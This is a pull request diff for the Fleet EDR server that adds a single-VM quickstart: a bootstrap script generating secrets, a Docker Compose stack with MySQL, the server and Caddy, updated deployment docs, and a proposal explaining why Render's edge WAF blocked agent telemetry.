### PR TITLE
feat(deploy): single-VM getting-started behind an operator-controlled…

### DIFF
--- a/README.md
+++ b/README.md
@@ -28,7 +28,13 @@ Two steps. Stand up a server, then push the agent to your Macs.
 
 **1. Stand up the server.**
 
-- **One-click on Render (fastest).** The blueprint provisions the server and a MySQL database behind Render's TLS edge, so there are no certificates to manage. Full walkthrough: [docs/deploy-render.md](docs/deploy-render.md).
+- **Single VM with your own domain (recommended).** One Linux VM, one script: Caddy gets a Let's Encrypt certificate automatically and reverse-proxies to the server, so you manage no certificates and no content-inspecting edge WAF flags your agents' telemetry as attacks. Full walkthrough: [docs/quickstart-vm.md](docs/quickstart-vm.md).
+
+  ```sh
+  EDR_DOMAIN=edr.example.com EDR_VERSION=v0.2.1 ./bootstrap.sh
+  ```
+
+- **One-click on Render (fastest to click, but read the caveat).** The blueprint provisions the server and a MySQL database behind Render's TLS edge, so there are no certificates to manage. Render's edge WAF blocks agent telemetry by default and you cannot disable it yourself, so this path needs a support-ticket workaround; see the warning in [docs/deploy-render.md](docs/deploy-render.md).
 
   [![Deploy to Render](https://render.com/images/deploy-to-render-button.svg)](https://render.com/deploy?repo=https://github.com/getvictor/fleet-edr)
 
@@ -92,6 +98,7 @@ Operator and reference docs live in [`docs/`](docs/):
 
 | Topic                                                    | Doc                                                                   |
 | -------------------------------------------------------- | --------------------------------------------------------------------- |
+| Deploy on a single VM with your own domain (recommended) | [`quickstart-vm.md`](docs/quickstart-vm.md)                           |
 | Deploy the server on Render                              | [`deploy-render.md`](docs/deploy-render.md)                           |
 | Self-host the server stack                               | [`install-server.md`](docs/install-server.md)                         |
 | Deploy the agent via any MDM                             | [`mdm-deployment.md`](docs/mdm-deployment.md)                         |

--- a/bootstrap.sh
+++ b/bootstrap.sh
@@ -1,0 +1,87 @@
+#!/usr/bin/env bash
+# Getting-started bootstrap for a single-VM EDR server (MySQL + server + Caddy).
+#
+# Generates the secret files, writes .env, and brings docker-compose.quickstart.yml
+# up. Safe to re-run: it never overwrites an existing secret, so re-running will
+# not rotate the enroll secret out from under already-enrolled agents.
+#
+# Usage:
+#   EDR_DOMAIN=edr.example.com ./bootstrap.sh
+#   EDR_DOMAIN=edr.example.com EDR_VERSION=v0.2.1 ./bootstrap.sh
+#
+# Prerequisites: Docker Engine 24+ with Compose v2, ports 80 and 443 open to the
+# internet, and a DNS A/AAAA record for EDR_DOMAIN pointing at this host.
+set -euo pipefail
+
+COMPOSE_FILE="docker-compose.quickstart.yml"
+
+die() { printf 'error: %s\n' "$1" >&2; exit 1; }
+
+command -v docker >/dev/null 2>&1 || die "docker is not installed"
+docker compose version >/dev/null 2>&1 || die "docker compose v2 is required"
+command -v openssl >/dev/null 2>&1 || die "openssl is not installed"
+
+DOMAIN="${EDR_DOMAIN:-${1:-}}"
+[ -n "$DOMAIN" ] || die "set EDR_DOMAIN, e.g. EDR_DOMAIN=edr.example.com ./bootstrap.sh"
+
+VERSION="${EDR_VERSION:-latest}"
+[ "$VERSION" = "latest" ] && \
+  printf 'warning: EDR_VERSION=latest; pin a release tag for production (EDR_VERSION=vX.Y.Z)\n' >&2
+
+mkdir -p secrets
+
+# gen_secret <file> <generator-command...>: write only if the file is absent or
+# empty. Command substitution strips the generator's trailing newline so the
+# secret file has no stray bytes.
+gen_secret() {
+	local f="$1"; shift
+	if [ -s "$f" ]; then
+		printf 'keeping existing %s\n' "$f"
+		return
+	fi
+	printf '%s' "$("$@")" > "$f"
+	printf 'generated %s\n' "$f"
+}
+
+gen_secret secrets/mysql_root openssl rand -hex 24
+gen_secret secrets/secret_key openssl rand -hex 32
+gen_secret secrets/enroll_secret openssl rand -base64 32
+
+# edr_dsn embeds the MySQL root password and must stay in sync with it, so it is
+# derived from mysql_root rather than generated independently.
+if [ ! -s secrets/edr_dsn ]; then
+	printf 'root:%s@tcp(mysql:3306)/edr?parseTime=true&tls=false' "$(cat secrets/mysql_root)" > secrets/edr_dsn
+	printf 'generated secrets/edr_dsn\n'
+fi
+# 0644, not 0600: Compose bind-mounts a file secret into the container with the
+# host file's owner and mode (the uid/gid/mode long-syntax options are Swarm
+# only and ignored here), and the server image runs as nonroot, so a 0600 file
+# owned by this host user is unreadable inside the container and the server
+# crash-loops on "permission denied". World-readable is acceptable on this
+# single-tenant VM: the file-secret win we keep is that the value never lands in
+# `docker inspect`, the process environment, or an image layer.
+chmod 0644 secrets/*
+
+cat > .env <<EOF
+EDR_DOMAIN=$DOMAIN
+EDR_VERSION=$VERSION
+EOF
+printf 'wrote .env\n'
+
+docker compose -f "$COMPOSE_FILE" --env-file .env up -d
+
+cat <<EOF
+
+Stack is starting. Caddy is requesting a Let's Encrypt certificate for $DOMAIN
+(ports 80 and 443 must be reachable from the internet and DNS must resolve here).
+
+Next steps:
+  1. Enroll secret. Put this in /etc/fleet-edr.conf on each Mac as EDR_ENROLL_SECRET:
+       $(cat secrets/enroll_secret)
+  2. Server URL for the agent (EDR_SERVER_URL): https://$DOMAIN
+  3. Redeem the break-glass admin. Grab the one-time URL from the logs and open it in a browser:
+       docker compose -f $COMPOSE_FILE logs server | grep -A4 BREAK-GLASS
+  4. Once the certificate is issued, confirm the server is up:
+       curl -s https://$DOMAIN/readyz
+  5. Open the console: https://$DOMAIN/ui/
+EOF

--- a/bootstrap.sh
+++ b/bootstrap.sh
@@ -15,27 +15,33 @@ set -euo pipefail
 
 COMPOSE_FILE="docker-compose.quickstart.yml"
 
-die() { printf 'error: %s\n' "$1" >&2; exit 1; }
+die() { local msg="$1"; printf 'error: %s\n' "$msg" >&2; exit 1; }
 
 command -v docker >/dev/null 2>&1 || die "docker is not installed"
 docker compose version >/dev/null 2>&1 || die "docker compose v2 is required"
 command -v openssl >/dev/null 2>&1 || die "openssl is not installed"
 
 DOMAIN="${EDR_DOMAIN:-${1:-}}"
-[ -n "$DOMAIN" ] || die "set EDR_DOMAIN, e.g. EDR_DOMAIN=edr.example.com ./bootstrap.sh"
+[[ -n "$DOMAIN" ]] || die "set EDR_DOMAIN, e.g. EDR_DOMAIN=edr.example.com ./bootstrap.sh"
 
 VERSION="${EDR_VERSION:-latest}"
-[ "$VERSION" = "latest" ] && \
+[[ "$VERSION" == "latest" ]] && \
   printf 'warning: EDR_VERSION=latest; pin a release tag for production (EDR_VERSION=vX.Y.Z)\n' >&2
 
 mkdir -p secrets
+# 0700 on the directory keeps the world-readable (0644) secret files below it
+# unreadable to other local users: a 0700 dir blocks non-owners from traversing
+# in, while the Docker daemon (root) still reads the files to bind-mount them.
+# The files stay 0644 because the nonroot server container must read them once
+# mounted (a host-owned 0600 file is unreadable inside the container).
+chmod 0700 secrets
 
 # gen_secret <file> <generator-command...>: write only if the file is absent or
 # empty. Command substitution strips the generator's trailing newline so the
 # secret file has no stray bytes.
 gen_secret() {
 	local f="$1"; shift
-	if [ -s "$f" ]; then
+	if [[ -s "$f" ]]; then
 		printf 'keeping existing %s\n' "$f"
 		return
 	fi
@@ -49,7 +55,7 @@ gen_secret secrets/enroll_secret openssl rand -base64 32
 
 # edr_dsn embeds the MySQL root password and must stay in sync with it, so it is
 # derived from mysql_root rather than generated independently.
-if [ ! -s secrets/edr_dsn ]; then
+if [[ ! -s secrets/edr_dsn ]]; then
 	printf 'root:%s@tcp(mysql:3306)/edr?parseTime=true&tls=false' "$(cat secrets/mysql_root)" > secrets/edr_dsn
 	printf 'generated secrets/edr_dsn\n'
 fi
@@ -62,10 +68,20 @@ fi
 # `docker inspect`, the process environment, or an image layer.
 chmod 0644 secrets/*
 
-cat > .env <<EOF
-EDR_DOMAIN=$DOMAIN
-EDR_VERSION=$VERSION
-EOF
+# Rewrite only EDR_DOMAIN and EDR_VERSION, preserving any operator-added settings
+# (OTEL_* export config, EDR_RETENTION_DAYS overrides, etc.) so a rerun does not
+# silently wipe them. This keeps the "safe to re-run" promise for .env, not just
+# for the secret files.
+tmp_env="$(mktemp)"
+if [[ -f .env ]]; then
+	grep -Ev '^(EDR_DOMAIN|EDR_VERSION)=' .env > "$tmp_env" || true
+fi
+{
+	printf 'EDR_DOMAIN=%s\n' "$DOMAIN"
+	printf 'EDR_VERSION=%s\n' "$VERSION"
+	cat "$tmp_env"
+} > .env
+rm -f "$tmp_env"
 printf 'wrote .env\n'
 
 docker compose -f "$COMPOSE_FILE" --env-file .env up -d

--- a/docker-compose.prod.README.md
+++ b/docker-compose.prod.README.md
@@ -10,16 +10,26 @@ This stack runs the fleet-edr-server + MySQL on a single host. It's the simplest
 echo 'EDR_VERSION=v0.1.0' > .env
 echo 'OTEL_EXPORTER_OTLP_ENDPOINT=http://host.docker.internal:4317' >> .env
 
-# 2. Generate two secret files. The MySQL root password + the full DSN that
+# 2. Generate the secret files. The MySQL root password + the full DSN that
 #    embeds it must stay in sync. This is the one awkward edge of using
 #    distroless (no shell in the server image, so we cannot derive the DSN
-#    at runtime from the root-password secret).
+#    at runtime from the root-password secret). secret_key is the deployment
+#    root secret (>=32 bytes); the server derives the host-token HMAC pepper and
+#    other long-lived keys from it and refuses to boot without it. Changing it
+#    later invalidates every enrolled host, so back it up.
 mkdir -p secrets tls
 MYSQL_PASS=$(openssl rand -hex 24)
 printf '%s' "$MYSQL_PASS" > secrets/mysql_root
 printf 'root:%s@tcp(mysql:3306)/edr?parseTime=true&tls=false' "$MYSQL_PASS" > secrets/edr_dsn
+printf '%s' "$(openssl rand -hex 32)" > secrets/secret_key
 printf 'pilot-enroll-secret-rotate-me' > secrets/enroll_secret
-chmod 0600 secrets/*
+# 0644, not 0600: Compose bind-mounts a file secret with the host file's owner
+# and mode (the uid/gid/mode long-syntax options are Swarm only), and the server
+# image runs as nonroot, so a 0600 file owned by your shell user is unreadable
+# inside the container and the server crash-loops on "permission denied". The
+# value still never lands in `docker inspect`, the process environment, or an
+# image layer, which is the point of using a file secret.
+chmod 0644 secrets/*
 
 # 3. TLS. Put fullchain.pem + privkey.pem under ./tls (Let's Encrypt output via
 #    certbot works directly). TLS is unconditionally required (issue #140
@@ -61,6 +71,8 @@ docker compose -f docker-compose.prod.yml --env-file .env restart server
 Existing per-host tokens are not affected by enroll-secret rotation because they were derived at enroll time, not re-verified against the secret on every auth. SIGHUP is NOT wired for secret reload; only TLS cert reload responds to it.
 
 **MySQL root password**. Overwrite both `secrets/mysql_root` and `secrets/edr_dsn` with the new password, then `docker compose up -d --force-recreate mysql server`. The volume data persists across recreates.
+
+**Deployment secret key** (`secrets/secret_key`). Treat this as un-rotatable in normal operation: every host token derives from it, so overwriting it invalidates every enrolled host and forces a fleet-wide re-enroll. Back it up rather than rotating it.
 
 **TLS cert**. Drop new `tls/fullchain.pem` + `tls/privkey.pem`. The server watches SIGHUP for TLS reload; `docker compose kill -s HUP server` swaps the cert without dropping active connections.
 

--- a/docker-compose.prod.README.md
+++ b/docker-compose.prod.README.md
@@ -18,6 +18,10 @@ echo 'OTEL_EXPORTER_OTLP_ENDPOINT=http://host.docker.internal:4317' >> .env
 #    other long-lived keys from it and refuses to boot without it. Changing it
 #    later invalidates every enrolled host, so back it up.
 mkdir -p secrets tls
+# 0700 on the directory keeps the world-readable (0644) secret files below it
+# unreadable to other local users: a 0700 dir blocks non-owners from traversing
+# in, while the Docker daemon (root) still reads the files to bind-mount them.
+chmod 0700 secrets
 MYSQL_PASS=$(openssl rand -hex 24)
 printf '%s' "$MYSQL_PASS" > secrets/mysql_root
 printf 'root:%s@tcp(mysql:3306)/edr?parseTime=true&tls=false' "$MYSQL_PASS" > secrets/edr_dsn

--- a/docker-compose.prod.yml
+++ b/docker-compose.prod.yml
@@ -52,6 +52,12 @@ services:
       EDR_DSN: ""
       EDR_DSN_FILE: /run/secrets/edr_dsn
       EDR_ENROLL_SECRET_FILE: /run/secrets/enroll_secret
+      # Deployment root secret (>=32 bytes). Required unconditionally: the
+      # host-token HMAC pepper and other long-lived keys derive from it via HKDF
+      # (server/config/config.go loadSecretKey), so the server refuses to boot
+      # without it. Read from a docker-secret file so it never lands in
+      # `docker inspect`. Changing it invalidates every enrolled host.
+      EDR_SECRET_KEY_FILE: /run/secrets/secret_key
       # TLS cert paths are unconditionally required (issue #140 removed the
       # EDR_ALLOW_INSECURE_HTTP opt-out). Mount fullchain.pem + privkey.pem
       # under ./tls/ (or override EDR_TLS_DIR to point at your cert store).
@@ -91,3 +97,5 @@ secrets:
   # compose-secret hack: the operator writes it once. See README.
   edr_dsn:
     file: ./secrets/edr_dsn
+  secret_key:
+    file: ./secrets/secret_key

--- a/docker-compose.prod.yml
+++ b/docker-compose.prod.yml
@@ -75,6 +75,7 @@ services:
     secrets:
       - enroll_secret
       - edr_dsn
+      - secret_key
     ports:
       - "${EDR_LISTEN:-8088}:8088"
     # No server-side HEALTHCHECK: the distroless/static base has no shell

--- a/docker-compose.quickstart.yml
+++ b/docker-compose.quickstart.yml
@@ -1,0 +1,105 @@
+# Single-VM getting-started stack: MySQL + the EDR server + Caddy.
+#
+# Caddy terminates public HTTPS with automatic Let's Encrypt certificates and
+# reverse-proxies to the server over the private Docker network, so the operator
+# manages zero certificates and there is NO content-inspecting WAF in the path
+# (unlike a managed PaaS edge). Bring it up with ./bootstrap.sh, which generates
+# the secret files and .env this stack expects. Full walkthrough:
+# docs/quickstart-vm.md. For high availability, use
+# packaging/docker-compose-multi-replica.yml instead.
+
+services:
+  mysql:
+    image: mysql:8.4.9@sha256:c36050afdca850f23cef85703f84c7531a5ae155a11b5ee1c60acb09937c4084
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD_FILE: /run/secrets/mysql_root
+      MYSQL_DATABASE: edr
+    volumes:
+      - edr-mysql-data:/var/lib/mysql
+    secrets:
+      - mysql_root
+    healthcheck:
+      test: ["CMD-SHELL", "mysqladmin ping --silent 2>/dev/null || exit 1"]
+      interval: 5s
+      timeout: 5s
+      retries: 20
+      start_period: 10s
+
+  server:
+    # Pin EDR_VERSION in .env to a release tag for production; bootstrap.sh warns
+    # when it defaults to `latest`.
+    image: ghcr.io/getvictor/fleet-edr-server:${EDR_VERSION:-latest}
+    restart: unless-stopped
+    depends_on:
+      mysql:
+        condition: service_healthy
+    environment:
+      # DSN + secrets are read from files (docker secrets) so no password lands
+      # in `docker inspect`. EDR_DSN is blank so the *_FILE path wins.
+      EDR_DSN: ""
+      EDR_DSN_FILE: /run/secrets/edr_dsn
+      EDR_ENROLL_SECRET_FILE: /run/secrets/enroll_secret
+      EDR_SECRET_KEY_FILE: /run/secrets/secret_key
+      # Caddy terminates TLS in front; the server listens plaintext on the
+      # private Docker network only. It is never published to the host, so the
+      # only way in is through Caddy.
+      EDR_LISTEN_ADDR: "0.0.0.0:8088"
+      EDR_TLS_TERMINATED_BY_PROXY: "1"
+      # Trust X-Forwarded-For only from the Docker bridge network (Caddy). The
+      # default Compose address pool lives inside 172.16.0.0/12.
+      EDR_TRUSTED_PROXIES: "172.16.0.0/12"
+      # Break-glass WebAuthn binds credentials to the public host, so both must
+      # equal your domain.
+      EDR_BREAKGLASS_RP_ID: ${EDR_DOMAIN}
+      EDR_BREAKGLASS_RP_ORIGINS: https://${EDR_DOMAIN}
+      # Boot with break-glass only so you can redeem the first admin. Configure
+      # OIDC afterwards (see docs/install-server.md) and remove this.
+      EDR_AUTH_ALLOW_NO_OIDC: "1"
+      EDR_LOG_LEVEL: ${EDR_LOG_LEVEL:-info}
+      EDR_LOG_FORMAT: "json"
+      # OTel export (optional). Set OTEL_EXPORTER_OTLP_ENDPOINT in .env to an
+      # OTLP/gRPC collector to turn on traces, metrics, and logs; leave it unset
+      # to keep telemetry off. The URL scheme picks the transport: http:// is
+      # plaintext, https:// uses TLS. OTEL_EXPORTER_OTLP_HEADERS carries an
+      # auth/ingestion token (e.g. SigNoz Cloud); OTEL_RESOURCE_ATTRIBUTES sets
+      # deployment.environment and any other resource tags. See
+      # docs/quickstart-vm.md ("Send telemetry to a collector").
+      OTEL_EXPORTER_OTLP_ENDPOINT: ${OTEL_EXPORTER_OTLP_ENDPOINT:-}
+      OTEL_EXPORTER_OTLP_HEADERS: ${OTEL_EXPORTER_OTLP_HEADERS:-}
+      OTEL_RESOURCE_ATTRIBUTES: ${OTEL_RESOURCE_ATTRIBUTES:-}
+      OTEL_SERVICE_NAME: fleet-edr-server
+    secrets:
+      - enroll_secret
+      - edr_dsn
+      - secret_key
+
+  caddy:
+    image: caddy:2
+    restart: unless-stopped
+    depends_on:
+      - server
+    environment:
+      EDR_DOMAIN: ${EDR_DOMAIN}
+    ports:
+      - "80:80"
+      - "443:443"
+    volumes:
+      - ./packaging/caddy/Caddyfile:/etc/caddy/Caddyfile:ro
+      - caddy-data:/data
+      - caddy-config:/config
+
+volumes:
+  edr-mysql-data:
+  caddy-data:
+  caddy-config:
+
+secrets:
+  mysql_root:
+    file: ./secrets/mysql_root
+  enroll_secret:
+    file: ./secrets/enroll_secret
+  edr_dsn:
+    file: ./secrets/edr_dsn
+  secret_key:
+    file: ./secrets/secret_key

--- a/docker-compose.quickstart.yml
+++ b/docker-compose.quickstart.yml
@@ -58,6 +58,13 @@ services:
       EDR_AUTH_ALLOW_NO_OIDC: "1"
       EDR_LOG_LEVEL: ${EDR_LOG_LEVEL:-info}
       EDR_LOG_FORMAT: "json"
+      # Event retention window. 7 days (not the 30-day server default) keeps the
+      # MySQL disk bounded: events are the dominant store and grow ~8-10 GB per
+      # day per busy host (index-heavy rows). Interim value pending the storage
+      # rework in getvictor/fleet-edr#408; raise it once that lands and disk per
+      # event drops. Alerts are never pruned by retention, so this only bounds
+      # raw-event lookback. Override in .env if you have the disk for more.
+      EDR_RETENTION_DAYS: ${EDR_RETENTION_DAYS:-7}
       # OTel export (optional). Set OTEL_EXPORTER_OTLP_ENDPOINT in .env to an
       # OTLP/gRPC collector to turn on traces, metrics, and logs; leave it unset
       # to keep telemetry off. The URL scheme picks the transport: http:// is

--- a/docs/README.md
+++ b/docs/README.md
@@ -6,7 +6,8 @@ Operator-facing documentation for Fleet EDR. For developer setup see the repo-ro
 
 | You are                                                                   | Start here                                           |
 | ------------------------------------------------------------------------- | ---------------------------------------------------- |
-| Standing up the server for the first time                                 | [`install-server.md`](install-server.md)             |
+| Standing up the server for the first time (recommended path)              | [`quickstart-vm.md`](quickstart-vm.md)               |
+| Standing up the server with your own TLS-terminating ingress              | [`install-server.md`](install-server.md)             |
 | Evaluating the agent on a handful of Macs without MDM                     | [`install-agent-manual.md`](install-agent-manual.md) |
 | Deploying to a fleet via any MDM (Jamf, Kandji, Intune, mosyle, Fleet)    | [`mdm-deployment.md`](mdm-deployment.md)             |
 | Deploying specifically via Fleet MDM                                      | [`fleet-deployment.md`](fleet-deployment.md)         |
@@ -19,7 +20,7 @@ Operator-facing documentation for Fleet EDR. For developer setup see the repo-ro
 
 ## Getting started
 
-The fastest path to an evaluation: deploy the server on Render (one click, TLS and MySQL handled for you), then push the agent to your Macs through Fleet MDM. See [deploy-render.md](deploy-render.md) for the server and [fleet-deployment.md](fleet-deployment.md) for the agents.
+The recommended path: stand up the server on a single Linux VM with your own domain (one script, automatic Let's Encrypt certificate, no edge WAF to block agent telemetry), then push the agent to your Macs through Fleet MDM. See [quickstart-vm.md](quickstart-vm.md) for the server and [fleet-deployment.md](fleet-deployment.md) for the agents. Render is a one-click alternative for a throwaway evaluation, but its edge WAF blocks agent telemetry by default and needs a support-ticket workaround; see the caveat in [deploy-render.md](deploy-render.md).
 
 ## Shape of a Fleet EDR deployment
 

--- a/docs/deploy-render.md
+++ b/docs/deploy-render.md
@@ -1,5 +1,9 @@
 # Deploy the EDR server on Render
 
+> [!WARNING]
+>
+> **Render's edge WAF blocks agent telemetry by default, and you cannot turn it off yourself.** The agent uploads security telemetry (captured command lines, file paths, malware and C2 activity) that legitimately contains attack signatures. Render's managed edge WAF flags those uploads as attacks and returns `403` before they ever reach the server, so no events arrive and the agent logs `uploader upload failed ... server returned 403` in a loop. Render does not expose a customer-configurable WAF on any plan, so the only fixes are: (1) open a Render support ticket asking them to exempt the agent routes (`POST /api/events`, `PUT /api/commands/*`, `GET /api/commands`, `POST /api/enroll`) from WAF inspection, or (2) deploy somewhere the edge is yours to control. For a deployment with no WAF in the path and zero certificate management, use the single-VM quickstart instead: [quickstart-vm.md](quickstart-vm.md). That is the recommended getting-started path; Render is convenient for a throwaway evaluation but carries this footgun.
+
 This is the fastest way to stand up a Fleet EDR server for an evaluation or pilot: Render hosts the server and a bundled MySQL, and terminates TLS at its edge so there are no certificates to manage. Once the server is up, deploy the agent to your Macs through your MDM (see [fleet-deployment.md](fleet-deployment.md) for the Fleet recipe, or [mdm-deployment.md](mdm-deployment.md) for the vendor-neutral contract).
 
 For a self-hosted server with your own TLS certificates instead, see the production docker-compose stack (`docker-compose.prod.yml`).

--- a/docs/quickstart-vm.md
+++ b/docs/quickstart-vm.md
@@ -46,7 +46,7 @@ This is the recommended way to stand up a Fleet EDR server for a pilot. You run 
 
    Open that URL in a browser within its TTL and register a passkey to become admin. Then open the console at `https://edr.example.com/ui/`.
 
-6. Deploy the agent. The bootstrap output prints your enroll secret and server URL. Put them on each Mac (`EDR_SERVER_URL` and `EDR_ENROLL_SECRET` in `/etc/fleet-edr.conf`); see [install-agent-manual.md](install-agent-manual.md) for a single Mac or [mdm-deployment.md](mdm-deployment.md) to deploy through your MDM.
+6. Deploy the agent. The bootstrap output prints your enroll secret and server URL. Put them on each Mac (`EDR_SERVER_URL` and `EDR_ENROLL_SECRET` in `/etc/fleet-edr.conf`); see [install-agent-manual.md](install-agent-manual.md) for a single Mac or [mdm-deployment.md](mdm-deployment.md) to deploy through your MDM. To keep telemetry volume down on this disk-bounded pilot, also set `EDR_PROCESS_RECONCILE_INTERVAL=5m` in `/etc/fleet-edr.conf` (default is 60s): it cuts the agent's per-process liveness heartbeats roughly fivefold with no detection impact. This is an interim setting pending the storage rework in [getvictor/fleet-edr#408](https://github.com/getvictor/fleet-edr/issues/408); revert to the default once that lands.
 
 ## Operations
 

--- a/docs/quickstart-vm.md
+++ b/docs/quickstart-vm.md
@@ -1,0 +1,87 @@
+# Quickstart: single VM with your own domain
+
+This is the recommended way to stand up a Fleet EDR server for a pilot. You run one Linux VM with Docker, point a domain at it, and run one script. Caddy gets a Let's Encrypt certificate automatically and reverse-proxies to the server, so you manage no certificates, and because Caddy is a plain reverse proxy there is no content-inspecting WAF to flag your agents' telemetry as attacks (the failure mode you hit on a managed PaaS edge). The stack is sized for a single customer with 10 to 500 endpoints. For high availability, see the multi-replica topology in [install-server.md](install-server.md).
+
+## What you get
+
+`docker-compose.quickstart.yml` runs three containers on one host: MySQL, the EDR server (listening plaintext on the private Docker network only), and Caddy (the only container exposed to the internet, on ports 80 and 443). The server self-applies its schema migrations on first boot.
+
+## Prerequisites
+
+- A Linux VM with Docker Engine 24+ and Docker Compose v2 (`docker compose`, not `docker-compose`). A 2 vCPU / 4 GB instance is comfortable for a pilot.
+- A domain you control (for example `edr.example.com`).
+- Ports 80 and 443 open to the internet on the VM. Caddy needs both for the ACME certificate challenge and for serving traffic.
+- A DNS `A` (and optional `AAAA`) record for your domain pointing at the VM's public IP, created before you run the script so the certificate can be issued.
+
+## Steps
+
+1. Get the repository onto the VM and change into it:
+
+   ```sh
+   git clone https://github.com/getvictor/fleet-edr.git
+   cd fleet-edr
+   ```
+
+2. Point your DNS record at the VM and wait for it to resolve (`dig +short edr.example.com` should return the VM IP).
+
+3. Run the bootstrap, passing your domain and a pinned release version:
+
+   ```sh
+   EDR_DOMAIN=edr.example.com EDR_VERSION=v0.2.1 ./bootstrap.sh
+   ```
+
+   It generates the secrets (`secrets/`), writes `.env`, and starts the stack. It is safe to re-run; it never overwrites an existing secret.
+
+4. Wait for the certificate to be issued (usually under a minute), then confirm the server is up:
+
+   ```sh
+   curl -s https://edr.example.com/readyz
+   ```
+
+5. Redeem the break-glass admin. On first boot the server prints a one-time redemption URL (not a password) to its logs:
+
+   ```sh
+   docker compose -f docker-compose.quickstart.yml logs server | grep -A4 BREAK-GLASS
+   ```
+
+   Open that URL in a browser within its TTL and register a passkey to become admin. Then open the console at `https://edr.example.com/ui/`.
+
+6. Deploy the agent. The bootstrap output prints your enroll secret and server URL. Put them on each Mac (`EDR_SERVER_URL` and `EDR_ENROLL_SECRET` in `/etc/fleet-edr.conf`); see [install-agent-manual.md](install-agent-manual.md) for a single Mac or [mdm-deployment.md](mdm-deployment.md) to deploy through your MDM.
+
+## Operations
+
+- **Upgrade.** Edit `EDR_VERSION` in `.env`, then pull and recreate:
+
+  ```sh
+  docker compose -f docker-compose.quickstart.yml --env-file .env pull server
+  docker compose -f docker-compose.quickstart.yml --env-file .env up -d
+  ```
+
+- **Where state lives.** Durable data is in the `edr-mysql-data` Docker volume; issued certificates are in the `caddy-data` volume. Back both up (a `mysqldump` schedule plus a volume snapshot). The `secrets/` directory holds the enroll secret, the deployment secret key, and the database credentials; keep a copy somewhere safe, because the secret key cannot be regenerated without invalidating every enrolled host.
+
+- **Rotate the enroll secret.** Overwrite `secrets/enroll_secret` and `docker compose -f docker-compose.quickstart.yml restart server`. Existing host tokens are unaffected (they were derived at enroll time).
+
+- **Configure OIDC.** The quickstart boots with break-glass sign-in only (`EDR_AUTH_ALLOW_NO_OIDC=1`). To add your IdP for ongoing access, set the `EDR_OIDC_*` variables and remove that flag; see [install-server.md](install-server.md).
+
+## Send telemetry to a collector
+
+The server exports OpenTelemetry traces, metrics, and logs over OTLP/gRPC. It is off until you point it at a collector. To turn it on, add the endpoint to `.env` and recreate the server:
+
+```sh
+echo 'OTEL_EXPORTER_OTLP_ENDPOINT=https://ingest.us.signoz.cloud:443' >> .env
+docker compose -f docker-compose.quickstart.yml --env-file .env up -d server
+```
+
+The URL scheme picks the transport: `http://host:4317` is plaintext (a collector on the same VM or private network), `https://host:443` uses TLS (a hosted backend). The quickstart compose forwards three OTel variables from `.env`, all optional:
+
+- `OTEL_EXPORTER_OTLP_ENDPOINT`: the OTLP/gRPC collector URL. Unset disables export entirely.
+- `OTEL_EXPORTER_OTLP_HEADERS`: comma-separated headers, used for an ingestion or auth token, for example `signoz-ingestion-key=<key>` for SigNoz Cloud or `authorization=Bearer <token>` for an OTLP gateway.
+- `OTEL_RESOURCE_ATTRIBUTES`: comma-separated resource tags. Set `deployment.environment.name=production` (or `staging`, etc.) so the backend can separate this deployment's signals from others. `service.name` is already pinned to `fleet-edr-server`.
+
+The full list of exported metrics and what to alert on is in [install-server.md](install-server.md#otel-metrics-and-logs) and [operations.md](operations.md#metrics-and-monitoring). There is no Prometheus scrape endpoint; export is OTel-only.
+
+If you run the collector as a fourth container in this stack, reach it by its Compose service name (for example `http://collector:4317`) rather than `localhost`, because each container has its own loopback.
+
+## Why no WAF here
+
+Agent telemetry legitimately contains attack signatures (captured command lines, file paths, malware and C2 activity), which a content-inspecting WAF flags as attacks and blocks. Caddy in this stack is a plain reverse proxy with no managed ruleset, so uploads to `POST /api/events` are never inspected for signatures. The authenticated agent channel is protected by its bearer token, which is the right control for machine-to-machine traffic. If you deploy behind a managed edge that does run a WAF (for example Render), you must exempt the agent routes from inspection; see [deploy-render.md](deploy-render.md).

--- a/openspec/changes/single-vm-getting-started/proposal.md
+++ b/openspec/changes/single-vm-getting-started/proposal.md
@@ -1,0 +1,23 @@
+# Single-VM getting-started with an operator-controlled edge
+
+## Why
+
+A pilot agent stopped delivering events to the Render-hosted server, logging `uploader upload failed ... server returned 403` in a loop and then quarantining events. Reproduction against production isolated the cause: Render's Cloudflare edge runs a content-inspecting WAF that flags the agent's telemetry as an attack and returns `403` before the request reaches the app. Two same-size, same-header POSTs to `/api/events` proved it: a benign body returned `401` from the origin (`x-render-origin-server: Render`), while a body full of shell, C2, and SQL-injection strings returned a `403` Cloudflare block page with no origin header. The server's ingest path emits only `200/400/413/500` (host-token auth returns `401`), so the app never produced the `403`. Enroll secret and token were ruled out: a freshly enrolled token is blocked just the same.
+
+Agent telemetry legitimately carries attack signatures (captured command lines, file paths, malware and C2 indicators), so any content-inspecting edge will keep blocking it, and compression does not help because a real WAF decompresses first. The structural fix is to keep the authenticated machine-to-machine ingest path off any managed-PaaS edge the operator cannot configure. Render exposes no customer-configurable WAF on any plan. The EDR's own reference reverse proxy (Caddy / NGINX) has no WAF, so self-hosting behind an edge the operator controls is the durable answer.
+
+This change makes the default getting-started a single VM the operator controls, and pins the two invariants the incident exposed so they cannot silently regress.
+
+## What changes
+
+- **The default getting-started is a single VM with the operator's own domain.** A new `docker-compose.quickstart.yml` (MySQL + server + Caddy) plus `bootstrap.sh` and `docs/quickstart-vm.md` stand the stack up with one command. Caddy obtains a Let's Encrypt certificate automatically and reverse-proxies to the server over the private Docker network as a plain proxy with no managed ruleset, so the operator manages zero certificates and no content-inspecting edge sits in the agent path. The server runs in the existing proxy-terminated TLS mode (`EDR_TLS_TERMINATED_BY_PROXY=1`, see the `server-availability` "TLS may be terminated by a front proxy" requirement, unchanged here).
+- **`deploy-render.md` is demoted from the default getting-started** and carries a warning that Render's edge WAF blocks agent telemetry by default and cannot be disabled by the customer, with the two workarounds (a Render support ticket exempting the agent routes, or deploying where the edge is yours). The repo-root and `docs/` READMEs now point at the quickstart as the recommended path.
+- **The content-neutrality of ingest is pinned as a requirement** (`server-event-ingestion`): the authenticated ingest path decides acceptance on structure alone (auth, JSON shape, event count, body size, host-id match, server health) and never on payload content, so it never returns a content-block `403`. This is the server-side truth that makes a `403` diagnosably an edge artifact.
+- **The supported edge topology is pinned as a requirement** (`server-availability`): the default getting-started deployment fronts the server with a plain reverse proxy under the operator's control, so agent telemetry carrying attack signatures reaches the server; a managed edge that runs a WAF the operator cannot disable is supported only when the agent routes are exempted from inspection.
